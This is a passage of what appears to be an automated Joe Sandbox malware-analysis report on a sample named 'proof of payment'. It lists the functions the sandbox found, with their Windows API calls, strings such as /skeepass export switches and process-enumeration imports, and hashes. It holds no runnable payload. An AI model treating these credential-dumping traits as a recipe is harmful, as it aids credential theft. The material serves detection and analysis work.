                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                      • memcpy.MSVCRT ref: 004115C8
                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                      • API String ID: 4054529287-3175352466
                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                      • API String ID: 667068680-2887671607
                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 1607361635-601624466
                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf$memset$wcscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 2000436516-3842416460
                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1043902810-0
                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • wcschr.MSVCRT ref: 0040E3B8
                                      • memcpy.MSVCRT ref: 0040E3EC
                                      • memcpy.MSVCRT ref: 0040E407
                                      • memcpy.MSVCRT ref: 0040E422
                                      • memcpy.MSVCRT ref: 0040E43D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                      • API String ID: 3073804840-2252543386
                                      • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                      • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@??3@_snwprintfwcscpy
                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                      • API String ID: 2899246560-1542517562
                                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040DBCD
                                      • memset.MSVCRT ref: 0040DBE9
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                      • wcscpy.MSVCRT ref: 0040DC2D
                                      • wcscpy.MSVCRT ref: 0040DC3C
                                      • wcscpy.MSVCRT ref: 0040DC4C
                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                      • wcscpy.MSVCRT ref: 0040DCC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                      • API String ID: 3330709923-517860148
                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • memset.MSVCRT ref: 004085CF
                                      • memset.MSVCRT ref: 004085F1
                                      • memset.MSVCRT ref: 00408606
                                      • strcmp.MSVCRT ref: 00408645
                                      • _mbscpy.MSVCRT ref: 004086DB
                                      • _mbscpy.MSVCRT ref: 004086FA
                                      • memset.MSVCRT ref: 0040870E
                                      • strcmp.MSVCRT ref: 0040876B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                      • String ID: ---
                                      • API String ID: 3437578500-2854292027
                                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0041087D
                                      • memset.MSVCRT ref: 00410892
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                      • DeleteObject.GDI32(?), ref: 004109D0
                                      • DeleteObject.GDI32(?), ref: 004109D6
                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1010922700-0
                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • malloc.MSVCRT ref: 004186B7
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                      • malloc.MSVCRT ref: 004186FE
                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$FullNamePath$malloc$Version
                                      • String ID: |A
                                      • API String ID: 4233704886-1717621600
                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                      • API String ID: 2081463915-1959339147
                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2012295524-70141382
                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                      • API String ID: 667068680-3953557276
                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004121FF
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                      • SelectObject.GDI32(?,?), ref: 00412251
                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                      • SetCursor.USER32(00000000), ref: 004122BC
                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                      • memcpy.MSVCRT ref: 0041234D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                      • String ID:
                                      • API String ID: 1700100422-0
                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
